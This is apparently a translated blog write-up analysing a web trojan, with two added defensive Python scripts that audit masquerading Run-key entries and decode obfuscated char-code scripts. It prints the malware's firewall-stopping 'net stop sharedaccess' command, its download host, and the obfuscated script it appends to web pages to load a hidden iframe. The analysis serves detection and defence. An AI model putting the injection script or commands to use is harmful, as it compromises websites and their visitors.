Seeing this news at FF..., he unpacked the webpage...
It turned out to be an "old friend", the Assassin Group... I have dealt with the web trojans generated by this group many times...
There is a * trojan planted at
hxxp:///pic/ddb/
Let's make an analysis here...
Run the sample.
Release the file
C:\
Calls cmd to run the command /c net stop sharedaccess (stopping the Windows Firewall / Internet Connection Sharing service)
Visit the website
61.129.102.79
It communicates with hxxp:// on port 80
Downloads: hxxp:///es86/db/
This file is a RAR archive.
Extracts the files as
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
Writes to the registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\"
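The persistence step above uses a Run value named "svchost" that points at an executable under Common Files rather than under the Windows directory. The following is an added example, not code from the original post: a small Python audit that takes exported Run-key values and flags entries whose name or image borrows a core Windows process name while the image sits outside C:\Windows. The entries are constructed; the file name svchost.exe under the vinavbar directory is a placeholder because the post omits the real name, and %windir% is assumed to be C:\Windows.

```python
import ntpath

# Names of core Windows processes that malware likes to borrow for autorun
# entries. A genuine copy lives somewhere under the Windows directory.
SYSTEM_PROCESS_NAMES = {"svchost", "csrss", "lsass", "winlogon", "services", "smss", "explorer"}
WINDOWS_DIR = r"c:\windows"

# Constructed sample of HKLM\...\CurrentVersion\Run values (name -> command).
# The last entry mirrors the one described on this page; its file name
# (svchost.exe) is a placeholder because the post does not give it.
SAMPLE_RUN_VALUES = {
    "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "svchost": r"C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\svchost.exe",
}


def expand_env(path):
    """Expand the two variables that commonly appear in Run values (assumed C:\\Windows)."""
    out = path
    for var in ("%windir%", "%systemroot%"):
        idx = out.lower().find(var)
        if idx >= 0:
            out = out[:idx] + r"C:\Windows" + out[idx + len(var):]
    return out


def image_path(command):
    """Extract the executable path from a Run value's command line."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    idx = cmd.lower().find(".exe")
    return cmd[: idx + 4] if idx >= 0 else cmd.split(" ", 1)[0]


def in_windows_dir(directory):
    d = directory.lower()
    return d == WINDOWS_DIR or d.startswith(WINDOWS_DIR + "\\")


def audit_run_values(values):
    """Return (name, path, reasons) for entries that look like masquerading persistence."""
    findings = []
    for name, command in values.items():
        path = expand_env(image_path(command))
        base = ntpath.splitext(ntpath.basename(path))[0].lower()
        directory = ntpath.dirname(path)
        reasons = []
        borrowed_name = name.lower() in SYSTEM_PROCESS_NAMES or base in SYSTEM_PROCESS_NAMES
        if borrowed_name and not in_windows_dir(directory):
            reasons.append("system process name but image is outside the Windows directory")
        if not path.lower().endswith(".exe"):
            reasons.append("image is not an .exe")
        if reasons:
            findings.append((name, path, reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in audit_run_values(SAMPLE_RUN_VALUES):
        print(f"{name}: {path}\n  " + "; ".join(reasons))
```

The check is deliberately narrow: it does not try to verify signatures or hashes, only the name/location mismatch that this sample shows, which is cheap to run over a batch of exported registry hives.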
Appends the following code to the end of .htm and .aspx files:
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("("+p+")");
(p);</script>
Decoded as:
<script>
p="<iframe height=0 width=0 src="/"></iframe>"
p=eval("("+p+")");
(p);</script>
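The obfuscation above is only a comma-separated list of character codes that the browser turns back into markup. The following is an added example, not code from the original post: a Python checker that pulls such strings out of a page's script blocks, decodes them with chr() instead of eval, and flags hidden (height=0 / width=0) iframes together with their src targets. The sample page is constructed, and its iframe target (example.invalid) is a placeholder rather than the real site.

```python
import re

# Constructed sample: a page with an obfuscated <script> appended after </html>,
# shaped like the one described on this page. The iframe target is a
# placeholder (example.invalid), not the real one.
SAMPLE_HTML = """<html><body><h1>Site</h1></body></html>
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("("+p+")");
(p);</script>
"""

SCRIPT_BLOCK = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
# A quoted run of at least two decimal numbers separated by commas.
CHARCODE_STRING = re.compile(r'"((?:\d{1,3},)+\d{1,3})"')
HIDDEN_IFRAME = re.compile(r"<iframe[^>]*\b(?:height|width)\s*=\s*[\"']?0\b[^>]*>", re.I)
SRC_ATTR = re.compile(r"src\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def decode_charcodes(csv):
    """Turn '60,105,...' back into text with chr(), never with eval."""
    return "".join(chr(int(n)) for n in csv.split(","))


def scan_html(html):
    """Return one finding per char-code string found inside a <script> block."""
    findings = []
    for block in SCRIPT_BLOCK.finditer(html):
        for m in CHARCODE_STRING.finditer(block.group(1)):
            decoded = decode_charcodes(m.group(1))
            findings.append({
                "decoded": decoded,
                "hidden_iframe": HIDDEN_IFRAME.search(decoded) is not None,
                "src": SRC_ATTR.findall(decoded),
            })
    return findings


if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        label = "HIDDEN IFRAME" if f["hidden_iframe"] else "decoded"
        print(f"{label}: {f['decoded']} -> {f['src']}")
```

Decoding offline matters here: in JavaScript, eval("(60,105,...)") only yields the last number via the comma operator, and the string has to pass through String.fromCharCode before the markup appears, so an analyst who reproduces the decode with chr() sees the same iframe without running any of the page's code.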
Online scan results:
AntiVir 7.3.1.38 03.02.2007 TR/
BitDefender 7.2 03.02.2007 DeepScan:.D212BB22
eSafe 7.0.14.0 02.28.2007 suspicious */Worm
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader
Ikarus T3.1.1.3 03.02.2007 Backdoor.
NOD32v2 2090 03.02.2007 a variant of Win32/
Norman 5.80.02 03.02.2007 W32/Downloader
Panda 9.0.0.4 03.01.2007 Suspicious file
All of the above analysis was done in a virtual machine.
The packer added this time really can't be removed... I can't see more details...
However, it is presumably written in Borland Delphi 6.0-7.0.
It tries to close some security software. I guess there are also...
=.= I sigh again... What a lousy packer...